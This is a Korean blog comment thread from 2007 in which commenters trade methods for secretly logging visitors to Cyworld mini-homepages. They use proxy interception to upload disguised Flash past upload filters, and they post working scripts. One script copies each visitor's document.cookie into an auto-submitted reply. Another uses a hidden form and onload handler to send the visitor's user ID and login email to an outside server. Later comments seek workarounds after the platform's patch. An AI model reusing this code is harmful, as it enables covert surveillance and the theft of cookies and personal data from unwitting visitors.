Commented by fan at 2007-02-27 15:49 # x





저같은 경우에는
먼저.다이어리에 비밀글을 쓴후 속성보기로 숫자값을 플래시mx 통해서 http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호
여기에 대입후 swf파일을 만들엇어요.

그다음 그 파일을 비공개게시판에 올렸고 스토리룸 수정에서 위에 질문드린것을 해결하여
현재 플래쉬가 올라와있습니다. 티가좀 나긴 하지만..^^;;

그런대.. 댓글이 안달려요..ㅠ

Commented by 워니 at 2007-02-27 15:51 #





음, fan님 싸이 주소좀 가르쳐 주시겠어요? 한번 살펴보고싶네요;;
어떤 문제가 있는 걸까요오 흐음 -

Commented by 워니 at 2007-02-27 15:52 #





아차, 제 싸이주소 http://www.cyworld.com/ssowonny 입니다


Commented by 닭아멍멍해봐 at 2007-02-27 15:52 # x





위니님..
저 같은 경우는 스토리룸 자체가 삭제가 되어버려서 수정 버튼이 없습니다.
그래서 스토리룸 설정으로 들어가면 계속 화면이 바뀌어서 아무것도 못하고 있습니다.. ㅠㅠ

Commented by 워니 at 2007-02-27 15:55 #





닭아멍멍해봐// 아, 설정을 누르면 잠깐 있다가 화면이 바뀌죠? 그 사이에 `스토리룸 저장'버튼을 마구마구 누르는 겁니다-_-)b


Commented by 돕는자 at 2007-02-27 15:56 # x





음..역시 리눅스에서는 안되네요...

윈도우에서 하니까..리플이 달리네.. 이상하네요...

Commented by 워니 at 2007-02-27 15:57 #





fan 님,
플래쉬 만들때 숫자 뒤에 tid를 안지우셨군요.

http://www.iwonny.net/source/cy_count/storyroom.php?tid=111111tid&item_seq=222222

이런 식으로 넣어 놓으셨네요.
빨간 글씨는 모두 지워주셔야합니다.

Commented by fan at 2007-02-27 15:58 # x





아. 일단 해볼께요.ㅎ;


Commented by 워니 at 2007-02-27 15:59 #





돕는자// 음, 브라우져로 파이어폭스 쓰시겠군요?
음, 익스플로러와 파폭은 약간의 차이가 있을 수 있습니다.
두군데서 다 동작하지 않는것은 제가 웹표준을 지키지 않았다는 뜻이군요 ㅠ_ㅠ 흑흑

Commented by 닭아멍멍해봐 at 2007-02-27 16:00 # x





성공했습니다. 워니님과 돕는자님께 감사드립니다.
꾸벅~

Commented by 돕는자 at 2007-02-27 16:02 # x





맞습니다. 파폭을 쓰더라구요.. 리눅스 교육인데... 전체적으로 불안정하네요...

그 귀책이 워니님께 있는건가요? ㅋㅋ

Commented by 벙개 at 2007-02-27 16:09 # x





와우~성공했습니다. 성취감이 대단한대요..ㅋㅋ 감사합니다!!


Commented by 워니 at 2007-02-27 16:23 #





닭아멍멍해봐// 축하드려요~
돕는자// 어허허허허허 귀책이라뇨 ㅠ_ㅠ ㅎㅎ 방법이 있는것 만은 확실합니다만,,,, 헤헤
벙개// 축하드려요~
오적암살단//
네, 게시판에 있는 글을 지워도 첨부파일이 안 없어지죠? ㅋ(이것도 어제 친구 도와주다가 처음 알았다는...)
-_-a 아마 하드디스크가 많이 남아서 좀 많이 기록하려나보네요 ㅎㅎ
자기 기록 안남는거 잠깐 잡다가 회사일도 밀려서그만...ㅋ
제가 javascript쪽으로는 공부를 전혀 안해서요 ㅠ_ㅠ
window.parent 를 이용해서 iframe 두개를 뛰어 올라가 myuser_id 를 가져올 수 있다면 될것 같은데,,
문법상의 오류인가, 잘 안되더라구요 ㅋ
음 시간될 때 좀더 알아봐야겠군요 -0- ㅎㅎ
화이팅입니다!!! 전, 다시 일자리로 -_-a 헤헤;;

Commented by fan at 2007-02-27 16:28 # x





워니님..
드디어..
성공했음니다.ㅠ

정말.. 도움 많이 됬고 감사드려요.ㅎㅎ
이거 하면서 정말 이쪽으로 흥미가 많이 생겼어요.

어쨋든. 위 방법. 틀리지 않았네요.ㅎ

그럼 수고하세요들!

Commented by 돕는자 at 2007-02-27 16:28 # x





저는 교육이기는 하지만..사실상 땡땡이 중인데..

역시 유식한 분들과 얘기를 하니까..성과도 있고 재미도 잇네요...

감사합니다...

Commented by 쿠니쿠니 at 2007-02-27 16:33 # x





이번에 막히면,,,,,,,,,, 새로운게 나올 가능성은 거의 없네요.
제가 스토리룸으로 하는거 예전에 성공하고 또 다른방법을 몇주동안 찾아봤지만,,
도저히 방법이 생각이 안나더군요...
모두들 조심하셔야 합니다, 저는 설치해놓은거 지웠구요.
잠잠해 질때까지 다른방법 연구만 하렵니다.

Commented by fan at 2007-02-27 16:55 # x





아..
혹시 하고나서 지워야 하거나 그런 사항 있으면 가르쳐주세요..
뭐 남겨놧다 걸리는거 아닌가..ㅠ

Commented by 야니 at 2007-02-27 18:25 # x





아까 아침에 댓글 0일때 봤는데 대단하군요~ 그때는 바빠서 대충 보고는 갔는데~
이제는 저도 공개적으로 리플을 답니다.
워니님~ 너무 감사해요~
저도 같은 컴공과지만 많이 모자라네요~ ㅎㅎ
그냥 간단한 웹계정을 쓰니 php는 안되어서 html로 전 했어요~ ^^

Commented by 쭈운 at 2007-02-27 18:39 # x





정말 답답해서 질문 드려요 ㅜㅜ 답변 해주시면 고맙겠습니다. burp proxy 프로그램 사용까진 완료 했는데요.. 익스플로러 LAN설정에서 127.0.0.1 그리고 포트 8080으로 변경해주면 인터넷 자체가 안됩니다. 직장에서 해도 그러구 집에서두 그러네요.. 왜그런거죠? ㅜㅜ 인터넷이 되질 않으니 burp proxy에서 역시 잡히는게 하나도 없구요... 조금이라도 알려주시면 ㄳㄳ


Commented by 지나가던이;; at 2007-02-27 19:53 # x





우선 워니님 감사합니다.^^
우연히 이곳에 들리게 되어 좋은 정보 얻어갑니다.
쭈 운// 저도 이쪽에 문외한이라 이유는 모르지만, LAN 설정 프록시 서버 사용 체크 했을 땐 burp proxy 프로그램을 실행시만 인터넷이 되던데요.. 그냥 인터넷 사용할땐 체크해제. 왜 그런지는 모르겠습니다. 공부가 필요하다는...^^;;

Commented by 하앜 at 2007-02-27 20:11 # x





저도 쭈운님과 증상이 같습니다. burp proxy가 잡히긴 하나 인터넷이 안되네요..


Commented by fan at 2007-02-27 20:18 # x





저는 이렇게 했답니다..
일단 스토리룸 설정 가서 설정에서 마지막 확인 누르기 전에 랜 가서 설정하고
proxy키고 확인 누르면 나와요. 그담에 위에 있는대로 하고 다시 설정해주면 되더라고요.ㅎ

Commented by 후웅 at 2007-02-27 20:19 # x





스토리룸에요 게시판에 올린swf사진을 올리면요 ㅜㅜ
페이지를 찾을수없다는..

싸이만의 도특한(?)이미지가 나오네요..왜그러죠 ㅠㅠ

Commented by 아흑흑 at 2007-02-27 20:42 # x





스토리룸에 분명히 플래시파일까지 다올라갔는데 왜 리플이 안달리는걸까요 ㅠㅠ


Commented by 하앜 at 2007-02-27 21:13 # x





그리고 이거 플레시mx2004 필요한거 맞죠?


Commented by Spatialguy at 2007-02-27 22:20 #





잘하면 오늘 리플 100개 뚫겠다..


Commented by 크리스티아누 at 2007-02-27 22:47 # x





와 엄청난 리플들....ㅋㅋ
오늘 집이 15년 만에 이사하느라 지금 녹초가 되서;;;
다 읽진 못하겠고...ㅠㅠ또 담주 화욜에 셤이라ㅠ
음 어쨌든 오적암살단장님과 워니님 감사드려요..ㅠ
제 추적 방법은 옛날 소스 조금 수정해서 했는데
너무 허접해서...ㅠ조금만 관심있는 사람이라면 걍 다 눈치채는...
이제 그나마 방문하던 사람들도 안 들어오는 건 아닌지..

워니님 저랑 동갑인 것 같은데 친하게 지내요~ㅋㅋㅋㅋ
86맞으시죠? 그런데 무슨 회사 다니시는 듯???

Commented at 2007-02-27 23:20 # x





비공개 덧글입니다.


Commented by 하앜 at 2007-02-27 23:32 # x





아.... 왜 안되는지 모르겠네여...답답하네..ㅜㅜ
%2Fy54501%2F2007%2F2%2F27%2F21%2FMM%5F0%2Eswf로 나오네요....
왜 똑같이 안나오는지..;;

Commented by 벙개 at 2007-02-27 23:46 # x





응용 들어갔습니다. 기존에 꾸며놓은 미니룸 상태에서 스크린샷으로 복사한 담에
미니룸만큼만 잘라서, 이미지화 한담에 그걸 링크시켰더니, 감쪽같이...ㅎㅎ
ㄳㄳ

Commented by ?? at 2007-02-28 00:16 # x





정말 수고가 많으시네요. 대단하십니다.
blank.php의 역활은 뭔가요?
제 서버에 storyroom.php만 가져가도 작동하나요?

Commented by 움하하 at 2007-02-28 00:27 # x





드뎌 성공!
좋은정보감사합니다.ㅎ

Commented by 하앜 at 2007-02-28 00:36 # x





아..getUrl(`http: //www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다 이어리번호) 에 고유번호 다 입력하고 MM_0로 저장하고 싸이에 게시판 올려서 속성보기 아무리 해도 =%2Fy54601%2F2007%2F2%2F28%2F45%2FMM%5F0%2Eswf 같은 완전 다른이름파일만 올라가네여...ㅜㅜ


Commented by 하앜 at 2007-02-28 00:56 # x





아 캐감동 ㅜ.ㅜ 드디어 됐어여.......
워니님 getUrl(`이동할 페이지 주소');
여기 수정해야할거같네여.... getUrl('이동할 페이지 주소'); 루 해야 되는군염...

Commented by 스닉 at 2007-02-28 01:27 # x





자신은 댓글 안 다는 방법
초딩같은 코딩입니다만;;

document.cookie 로 출력해서
EpAutoLoginID의 값을
admin변수값에 넣어주세요. ^^

자신의 싸이월드 도메인을 설정하셔야 사용하실 수 있을듯 하네요. 그냥 추측임 -_-;;

<script>
function timeVal()
{
//시간설정
var time = new Date();
var yy = time.getYear();
var mm = time.getMonth() + 1;
var dd = time.getDate();
var hour = time.getHours();
var minute = time.getMinutes();
var second = time.getSeconds();
//출력변수
var pos_val = " ";
//관리자
var admin = "자신의싸이월드주소(도메인설정값?)";
var idx = "EpAutoLoginID=";
var idexpt = document.cookie;
idexpt = idexpt.substr(idx.length, admin.length);

mm = ((mm < 10) ? "0" : "") + mm;

hour = ((hour > 12) ? (hour - 12) : hour);
hour = ((hour < 10) ? "0" : "") + hour;
minute = ((minute < 10) ? ":0" : ":") + minute;
second = ((second < 10) ? ":0" : ":") + second;

pos_val += yy + "년 " + mm + "월 " + dd + "일 ";
pos_val += (hour >= 12) ? "pm" : "am"
pos_val += hour + minute + second
//pos_val += " IP주소 - <?php echo("$REMOTE_ADDR"); ?>";
pos_val += document.cookie;

//alert(document.cookie);

document.reply_frm0.content.value = pos_val;

if(idexpt != admin)
{
document.reply_frm0.submit();
}
}
</script>

마지막으로 스토리룸 로딩이 길어서 방문자가 5명중에 2명밖에 기록이 안 되네요. ㅡㅜ

Commented at 2007-02-28 01:49 # x





비공개 덧글입니다.


Commented by ?? at 2007-02-28 02:07 # x





일단.. blank.php파일은 없이 잘 돌아가네요.

근데, 뭔가 몇가지 개선해야 할 점이..

1. fake.jpg파일을 로드전에 그 전의 세팅화면이 보이네요.
2. 위의 방법 '대로만'설정하면 익스플로러 이미지 도구모음과 우클릭 메뉴로 인하여,
플래쉬가 아닌 그림파일이라는 것을 바로 알 수 있는데.
플래쉬 파일을 만들때, 배경에 원하는 fake그림 파일을 넣어서 우클릭시에도 플래쉬 메뉴가 뜨도록
할 수 없을까요?

Commented by 쿠니쿠니 at 2007-02-28 09:43 # x





fake 그림파일이 플래시 메뉴가 뜨려면
이미지를 출력하지 않고 또 다른 플래시 파일을 넣으면 되죠.

Commented by 워니 at 2007-02-28 09:59 #





쭈운//
프록시는 인터넷으로 오고 가는 정보를 먼저 잡아내죠.
예를 들어 네이버를 들어갔다고 생각해봅시다.
쭈운님 컴퓨터에서 네이버 서버에 페이지를 요청합니다.
네이버에서는 자신의 페이지 정보를 주겠죠?
여기서 네이버가 준 정보를 프록시가 먼저 받아냅니다. 그리고는 쭈운님 컴퓨터에 넘겨줘야 하는데,
어잌후? 쭈운님 컴퓨터의 프록시 서버 127.0.0.1 이고(이것은 본인의 컴퓨터를 얘기합니다)
burp proxy가 켜져있지 않은 경우, 프록시서버는 하는일이 없으니 쭈운님의 익스플로러에게 정보를 주지 않게 되는겁니다. (켜져 있는 경우에도 forward를 하지 않으면 정보를 전달하지 않으니 마찬가지겠지요?)

하앜// 아, 그게 헷갈리셨군요 에구구;; 같은 빨간색으로 해놔서 지우라는 의미였는데, 죄송합니다;; (전 강조할때 `이런식'으로 표현하곤 하거든요;;)

비밀//
네, 저도 개인정보 침해가 맞다고 생각합니다.
단, 싸이월드에 방문자 기록 코드를 심어 넣는 것이 `싸이월드 가입 약관'에 어긋나기 때문에 그렇다고 생각하고 있습니다.
자주 등장하는 토론거리중 하나가 아닐까 하는군요.
노벨은 다이너마이트를 만들지 말아야 했을까요.
(어이구, 별것도 아닌 것 가지고 노벨의 다이너마이트에 비교하려고 하니 상당히 민망하군요)
나중에 포스팅 생각이었지만, 간단히 얘기하자면,
노벨이 만들지 않았어도 다이너마이트는 만들어 졌을 것입니다.
과학적 발명에 있어서 과학자의 가치판단이 필요하긴 하지만,
너무 많은 변수 때문에 과학적 발전을 억제하는 것은 부정적이라는 생각입니다.
(살 상을 위해 다이너마이트를 만드는 것은 과학자 스스로의 생각으로 가치판단을 할 수 있지만, 유용한 것에 쓰려고 다이너마이트를 생각할 때 `이것은 살상으로 쓰일 수 있으니 만들면 안된다'라고 강요할 수는 없다는 것이 제 생각입니다. - 음, 논란거리가 될수도 있는 화제군요 ㅠ_ㅠ)
... ㅎㅎ 너무 거창했는데, 그런게 아니고
싸이측에서 이런 방법을 막는 것은 그리 어려운 일이 아닙니다.
돈도 많이(엄청나게) 벌었을 텐데, 웹상의 보안도 더 발전시켜 나가야겠죠.
얽히고 섥혀서 함께 더 앞으로 나아갔으면 하는 바람이네요.
그런 이유로 죄송합니다만, 포스팅을 지우지는 않겠습니다.


수정했습니다 -
맨 뒤에 img 넣으면 이미지 출력하구요,
img 대신에 embed=플래시주소 넣으면 플래시 출력하도록 하였습니다.
(확인해보진 않았지만, 아마될꺼에요 ㅎㅎ)

크리스티아누//
오오~ 좋죠 ㅋ 85년생이에요, 지금 병역특례 중입니다~
왠지 제가 알고있는 사람일 것 같다는 느낌이 드네요-_- ㅋㅋㅋ

앗, 일해야지

Commented by 크리스티아누 at 2007-02-28 10:48 # x





휴 싸이공격일지 2번째의 흠님 리플을 참고로
스토리룸 로딩할 때 하얀 화면 바뀌는 거를
프린트 스크린샷 그림판 갖다 붙이기 신공으로 얻은 이미지로 대체해서
방문자 추적 눈치 못 채게 바꿨습니다
워니님과는 다른 방법으로 옛날 소스 좀 수정해서요...

휴 복잡하네요 한달 정도 지나면 어떻게 했는 지도 까먹어버릴 듯..;;;
워니님 흠님 모두 심심한 감사를 드리고요ㅋ
싸이측에서 안 막았으면 좋겠네요

그건 그렇고 싸이 믿을 게 정말 못 되는 것 같습니다;;
믿을만한 이야기 인지는 모르겠지만
php 조금만 공부해서 머리 굴리면 싸이 비공개 일촌공개 비밀글까지 볼 수 있다고 하더군요..

Commented by 하앜 at 2007-02-28 11:23 # x





워니// 아니에요^^ 이 방법 알려주시는것만으로도 감사할 따름~
크리스티아누// 와 정말 비공개글까지 볼수있나요? 궁금해지네..
전 소스나 태그는 문외한이라..;; 남들이 올린거 보면서 연구하는...

Commented by fan at 2007-02-28 13:30 # x





성공했어도 계속 댓글보러 오게된다는 ㅡ.,ㅡ ㅋㅋ

호오.. 비공개글을 볼수 있다??!!

ㅋㅋ

저는 이게 궁금한대요.

플래쉬 올릴수 있엇던 원리가 이쪽에서 proxy로 오고가는 정보를 잡아내서

그걸 약간 수정해준거 맞죠?

그럼 싸이에서 이쪽으로 보내주는 정보를 약간의 수정을 통하면

다른것도 할수 있는거 맞나요??

Commented at 2007-02-28 15:09 # x





비공개 덧글입니다.


Commented at 2007-02-28 16:17 # x





비공개 덧글입니다.


Commented by 워니 at 2007-02-28 16:48 #





fan//
예전엔 1촌으로 속이는게 가능했다고 하더군요 `예전엔'.
그때 되던 방법은 싸이월드 측에서 막아 놓은 것 같고, 다른 것은 보지 않아서 잘 모르겠네요.
그나저나, 그렇게 된다면 정말 심각한 사생활 침해이고,
싸이월드는 `너무' 허술한 셈인데요-_-

비밀//
흠, 있긴 있을테지만,
일단은 좀 조용히 있으려구요 ㅎㅎ

비밀//
헉 -_-;; 무섭다아
... 델델델인데요;;

if문 한줄이면 막힐만한 방법인데 싸이월드가 방관하고 있는걸까요,
아니면 기자가 맘대로 터뜨려 버린 걸까요
(싸이월드 측에서도 그리 환영하지 않을 기사라고 생각합니다.)

잡혀가는건 아니겠죠? ㅠ_ㅠ 무섭다아

Commented by 지나가는이 at 2007-02-28 17:03 # x





http://news.naver.com/news/read.php?mode=LSS2D&office_id=025&article_id=0000647635&section_id=105&section_id2=226&menu_id=105

네이버에 기사떴네요..
싸이월드 방문자 추적 프로그램 또 유포

지난 1월 이 프로그램이 유포되면서 싸이월드는 싸이월드 이미지 편집기를 이용하지 않은 플래시 파일의 업로드를 막았다. 플래시 파일에 소스를 숨기는 경로 자체를 차단한 것이다. 하지만 최근 유포되고 있는 프로그램 설치 방법은 미니홈피의 게시판이나 사진첩 대신 스토리룸을 이용하는 방식이다.

Commented by fan at 2007-02-28 17:15 # x





헉..젝힐..ㅠ


Commented by 벙개 at 2007-02-28 18:00 # x





아핫, 이제 막힌것 같네요 ;;


Commented by 워니 at 2007-02-28 18:12 #





....허헛, 넵 그런것 같네요.
다이어리에도 where_chk를 넣었군요. 진작에 그러지-_- ㄲㄲ
플래쉬 올리는 것도 막아 놓았나 모르겠네요.
일단 현재 올라가 있는 플래시 주소는 바꿔놓지 않았군요.
(-_- 이거 근본적인 해결책이 아닌 듯 싶은데..)

여하튼, 다이어리에 리플로 달리는 것은 현재 막혔습니다.

Commented by 쭈운 at 2007-02-28 18:19 # x





기사 뜨니까 급하게 수정한 모양이군요.. -_-::


Commented by 워니 at 2007-02-28 18:19 #





ㅎㅎ엄청나긴 하겠지만, 기존에 관리만 잘 하고 있었다면 그리 무리가는 일 아니지 않을까요;;?


Commented by 지나가는이 at 2007-02-28 18:20 # x





where_chk 이건 뭐하는거에요?? 어디에있는지 체크?? ㅋㅋ


Commented by 워니 at 2007-02-28 18:22 #





네, 이름은 그런 것으로 정한 것 같고,
사용자 tid, 게시판 id, item_seq 정도를 이용해서 일정 숫자를 뱉어내는 것 같네요.
공식이 같지않으면 리플을 무시하는 것 같아요 - ㅋㅋ

Commented by 지나가는이 at 2007-02-28 18:23 # x





아... 임의 로 바뀌는 것인가.... ㅋㅋ..


Commented by 벙개 at 2007-02-28 18:24 # x





또 협박 쪽지 받기 전에 삭제해야지 안되겠네요.ㅋ


Commented by at 2007-02-28 18:30 # x





지나가던이// 근데 그렇게 하면 본인만 리플이 달리는걸로 알고 있는데.. 아닌가요?


Commented by 지나가는이 at 2007-02-28 18:31 # x





다른 사람도 달린답니다 <iframe> 태그로 그게시물 주소를 링크 시켜주면 됩니다..


Commented by 워니 at 2007-02-28 18:38 #





지나가는이//
음,미니홈피 게시판도 where_chk로 막힌지 꽤 오래된 것으로 알고있습니다.
클럽은 안막혀 있었던 것으로 알고 있었는데, 이번기회에 같이 막는지 안막는지 모르겠군요.

Commented by ?? at 2007-02-28 18:38 # x





나름 꽤 공부 해서 세팅했더니,
리플 다섯개 달리고 이렇게 끝인가요..ㅠ.ㅜ

Commented by 워니 at 2007-02-28 18:39 #





여튼, 게시판을 이용하지 않아도 기록하는 방법은 많이 있을 것으로 보입니다.


Commented by at 2007-02-28 18:39 # x





아 ~ 네


Commented by 지나가는이 at 2007-02-28 18:52 # x





근데 기자가 어디서 찾았을까요? 워니님 블로그??????

Commented by fan at 2007-02-28 19:16 # x





그럼.. 이제 끝난건가.. 겨우 이틀 써보고..휴...

좋은 경험이긴 했지만 너무 아쉽다...ㅠ

Commented by 하하 at 2007-02-28 19:16 # x





겔러리 쪽은 안되나요??


Commented by 크리스티아누 at 2007-02-28 19:17 # x





음...자다 일어나니까 이런 일이 벌어졌군요..ㅇ_ㅇ
누군가 제보를 했든지..
뭐 워니님 블로그도 구글에서 검색하면 잘 나오니까요..
포스트 제목이 방문자 추적이니..뭐 검색하면 걍 나오겠죠;;
저도 그렇게 해서 이 블로그를 처음 방문했고;

그렇게 빨리 기사가 뜰 줄이야..ㅠ
이틀도 사용 못 했는데..참참참....ㅠ

Commented by fan at 2007-02-28 19:20 # x





워니님 블로그 검색하면 쉽게 나오던대..

그럼 싸이월드 쪽에서도 찾기 쉽겟네..

휴. 기자도 대단하다. 금새 알아내다니..

워니님? 이제 방법이 없는걸까요?

전에 위쪽에 어떤분은 스토리룸 방법 막히면 아마 끝일꺼라고 하던대..ㅠ

Commented by R군 at 2007-02-28 19:26 # x





클럽에 리플이 달리는걸로 해보고싶지만
genbrd_shortreplyok.asp 이 파일의 주소를 모르겠네요;

Commented by 123 at 2007-02-28 19:57 # x





스토리룸에 플래시 안올라가네요 ㅠㅠ


Commented by 하앜 at 2007-02-28 21:17 # x





어제 4시간동안 연구해서 겨우 올려놨드만.................
대처 무쟈게 빠르구나............

Commented by 하앜 at 2007-02-28 21:21 # x





결국 프로필 추적을 고수해야하는군..ㅎㅎ
어쩄든 워니님 고생하셨는데 안타깝게 됐어요.
모든분들도 마찬가지....

Commented by marine at 2007-02-28 22:50 # x





허허..;; 오늘 와서 보니 폭삭 막혔군요.. 허허.;;;
누가 제보 했는지..ㅠㅠ
여하튼.. 클럽 게시판 쪽이나 아니면 php 함수 등을 이용해 다른 계정에 기록하는 방식을 연구할수도 있겠네요.

Commented by 우오 at 2007-02-28 23:07 # x





이구.. 막혔네요 ㅠㅠ

그러면 사진첩을 뚫어서 메인에 올려놓고
다른 계정에다가 기록해야겠네요..?
하루 써보고 막히다니 이궁;;
빠르기도해라...

Commented by 쿠니쿠니 at 2007-03-01 01:29 # x





클럽게시판은... 클럽에 가입이 안되어있으면 리플이 안남겨집니다..


Commented at 2007-03-01 01:55 # x





비공개 덧글입니다.


Commented at 2007-03-01 02:07 # x





비공개 덧글입니다.


Commented by R군 at 2007-03-01 03:44 # x





다른계정에다 기록을 한다면 사용자 이름같은게 바로 남을수 있을까요?;;


Commented by 죽겟네 at 2007-03-01 16:06 # x





캬,,컴맹으로썬 넘흐어렵네요,,포기해야겟다,, ㅜㅡㅜ


Commented by 피코피코 at 2007-03-01 16:56 # x





워니님

http://www.iwonny.net/source/cy_count/source.txt

위 소스를 제 홈페이지 visiter 폴더안에 index.php로 저장후

<FORM name=guest action=http://제홈페이지.co.kr/visiter/ method=post target=ifrm_symbol>
<INPUT type=hidden value=wonny name=user_name>
<INPUT type=hidden name=guest_name>
<INPUT type=hidden name=email>
<INPUT type=hidden name=datetime>
</FORM>
<IMG alt=blank src="http://제홈페이지/cymain.jpg" onload="window.parent.nameUI_init();document.getElementById('guest_name').value=window.parent.myuser_id;document.getElementById('email').value=window.parent.c2.nameUI.strLoginEmail;document.getElementById('datetime').value=new Date();document.getElementById('guest').submit();">

이렇게 폼을 형성후 입력후에도

제 홈페이지/visiter/wonny 페이지를 찾을수 없다고 나옵니다.

퍼미션은 777로 준 상태구요.

뭐가 문제일까요?

Commented by 피코피코 at 2007-03-01 16:56 # x





워니님

http://www.iwonny.net/source/cy_count/source.txt

위 소스를 제 홈페이지 visiter 폴더안에 index.php로 저장후

<FORM name=guest action=http://제홈페이지.co.kr/visiter/ method=post target=ifrm_symbol>
<INPUT type=hidden value=wonny name=user_name>
<INPUT type=hidden name=guest_name>
<INPUT type=hidden name=email>
<INPUT type=hidden name=datetime>
</FORM>
<IMG alt=blank src="http://제홈페이지/cymain.jpg" onload="window.parent.nameUI_init();document.getElementById('guest_name').value=window.parent.myuser_id;document.getElementById('email').value=window.parent.c2.nameUI.strLoginEmail;document.getElementById('datetime').value=new Date();document.getElementById('guest').submit();">

이렇게 폼을 형성후 입력후에도

제 홈페이지/visiter/wonny 페이지를 찾을수 없다고 나옵니다.

퍼미션은 777로 준 상태구요.

뭐가 문제일까요?

Commented by 저... at 2007-03-01 17:20 # x





이제는 방법이 없는건가요? 더이상 추적이 안되나요 여러분??


Commented by F2ShepHerd at 2007-03-01 17:22 #





http://news.media.daum.net/digital/computer/200702/28/joins/v15886204.html

ㄲㄲㄲㄲㄲㄲ

Commented by 또늦었네.. at 2007-03-01 17:42 # x





방문자 추적을 알게되고 나서....
안된다는 소식을 듣고 실망하다가 다른 홈페이지에서 또 다른 방법이 있다고 해서...
워니님 사이트 겨우 찾았는데 어제부로 또 막혔다니.......
안타깝습니다. 되는 방법 없을까요??

Commented by 샤니 at 2007-03-01 19:40 # x





뭐..개인개정으로 하는건 안막혔습니다..그런걸로 하시면 되고요...
또한..댓글도 클럽을 이용한다던가 그렇게 하면 되네용...전 아직도 잘 사용하고있고요..
스토리룸으로 안해도 메인사진에 플래시 올려서 해도 되네요...메인사진에 플래시 올리는건 약간의 노하우가 있어야 하고요...올린후에도 액션스크립트를 잘쓰면 충분히 잘되네용... 방법은 아직 여러가지네용...

Commented by 오우 at 2007-03-01 20:22 # x





샤니//
메인사진에 플래시 올리는거 어떻게 하나요?ㅋㅋ 약간의 힌트라도 좀 주세요~

Commented by youandme at 2007-03-01 21:06 # x





메인 사진에 플래시 올리는 문제보다.. 올린다고 해도
이젠 싸이 내부가 아니고 외부 계정에다가 방문자 기록이 남게 해야된단 얘기같은데..
전 그걸 어떻게 해야될지 막막하네요.. 누가 자세히좀 가르쳐주시면..ㅠㅠ

Commented by 스토리룸 at 2007-03-01 22:00 # x





스토리룸에 안올라가져요.
어떻하죠?
네크워크 연결이 안됬다구 자꾸 뜨는데...ㅠ ㅠ

Commented at 2007-03-01 22:31 # x





비공개 덧글입니다.


Commented at 2007-03-01 22:31 # x





비공개 덧글입니다.


Commented at 2007-03-01 22:55 # x





비공개 덧글입니다.


Commented by ?? at 2007-03-01 23:44 # x





기타 프로그램을 동원하지 않고도,
순발력만 좋으면 플래쉬를 사진첩이든, 어디든..올릴 수 있다고 들었습니다.
방법은 모르지만요;

다른 계정에 어떻게 남기는 방법.
정말,,, 공유가 안될까요. ㅋ (공유하면 이렇게 잘 막히는데, 저같아도 공유하기 싫을 것 같긴 하네요;)

Commented by 샤니 at 2007-03-01 23:48 # x





참고로 동영상첩은 자동댓글이 써집니다...하지만 비공개로 해도 보인다는거~~~ㅎㅎ
전 다른걸로 쓰고있지만..진짜 급하신분들만 하세요....
그리고 스토리룸보다 메인사진으로 하는게 속도가 훨씬 빨라서 바로바로 댓글달리고요 눈치챌 가능성없습니다...
하지만~~다른사람들이 1촌업데이트를 보면 바로 딱 걸린다는거~~ㅎㅎ
스토리룸에 플래시 업로드하신분들은 cy2에서도 충분히 사용가능할꺼라고 봅니다...

Commented by 가룽 at 2007-03-01 23:57 # x





아직 스토리룸에 플래쉬 올리는건 되는건가요?


Commented by (' ㅋㅋㅋ at 2007-03-02 01:32 # x





저는 싸이월드 2사용자인데요..

향후 싸이2 사용 메뉴중에 방문자들 기록남기는것도 추가하는걸로 알고있습니다

네이버 블로그같이..

Commented by (' ㅋㅋㅋ at 2007-03-02 01:32 # x





저는 싸이월드 2사용자인데요..

향후 싸이2 사용 메뉴중에 방문자들 기록남기는것도 추가하는걸로 알고있습니다

네이버 블로그같이..

Commented by 윽윽 at 2007-03-02 11:10 # x





제발 다른 방법즘 ㅠ ㅠ


Commented by 오우 at 2007-03-02 11:45 # x





순발력이라... 어렵네요 ㅋㅋ;;


Commented by 오우 at 2007-03-02 11:54 # x





일단 메인화면에 플래시를 올려놓고 싶은데.. 어렵네요 정말 ㅋㅋ


Commented by 오우 at 2007-03-02 18:01 # x





휴.. 한 3시간 연구끝에 다시 복구 했습니다 ㅋㅋ
잘되넹~
하지만... 음... 사진첩에 플래시 올리고 싶다 ㅠㅠㅠ

Commented by 하앜 at 2007-03-02 18:04 # x





걍 프로필 추적기나 고수를..


Commented by 궁금해요!! at 2007-03-02 19:59 # x





아~진짜미치게따
스토리룸에 swf저장 하려구하는데 자꾸 막히네요
도와주세용!!!

http://cyimg17.cyworld.nate.com/common/file_down.asp?redirect=%2Fy52701%2F2007%2F3%2F2%2F31%2FMM%5F0%2Eswf

swf있는 주소이거든요 싸이 게시판에 올린 주소에요
그냥 이대로 붙여넣기해서 주소변경하구 forward 누르니까 찾을수 없는 페이지라고하네요
그래서 그냥 원래대로 변경없이 on->off->forward 하니까 되는거에요
아무래도 주소가 이상있는거 같은데 도와주세요!!
제발 도와주세요

Commented by zzzz at 2007-03-02 20:22 # x





궁금해요!! >스토리룸은 싸이에서 막았습니다,,,, 참고하세요


Commented by lunar at 2007-03-02 23:50 # x





이미 올려놓은 플래쉬에 대해선 대처하지 않았군요.
이미 링크는 되어있으니 계정에 올려둔 플래쉬만 수정하면 될 듯한데.
php를 이용해서 외부계정에 기록 남길 수 있는 소스 자료 좀 부탁드립니다. 이거, 어떻게 만들어야할지 난감하군요.

Commented by 샤니 at 2007-03-03 02:33 # x





외부계정으로 하는건 어렵게 생각하시는데 쉽게 생각하시면 됩니다. 스토리룸에서 자기계정페이지로 넘어가면 그 페이지에서는 아이프레임으로 방문자 정보를 추출할수있는 페이지로 들어갑니다..(예: 프로필을 한번 찍고 온다던지그럼 되겠죠?) 그럼 프로필에서는 방문자의 정보를 추출하여 php로 값을 넘김니다.
그럼 그 넘어온값을 DB에 저장하면 땡입니다요~~중요한건 방문자의 이름은 못가져온다는거죠~

Commented by 오우 at 2007-03-03 11:46 # x





샤니님 메인화면에 플래시 올리기 힌트좀 주세요오~~ㅎㅎ


Commented by 샤니 at 2007-03-03 18:28 # x





힌트라기 보단 사진첩에 올려서 메인사진으로 등록하면 되고요...파로스를 이용합니다..
파로스를 이용하면 사진첩에 어떠한 태그도 다 쓸수 있지요...

Commented by 피코피코 at 2007-03-03 19:40 # x





샤니님 DB에 저장하는거 어떻게 하죠?;;

스크립트 좀 부탁드릴게요 ^^;

위에 제가 질문 올렸는데 그거 끌어올게요 ^^

[
http://www.iwonny.net/source/cy_count/source.txt

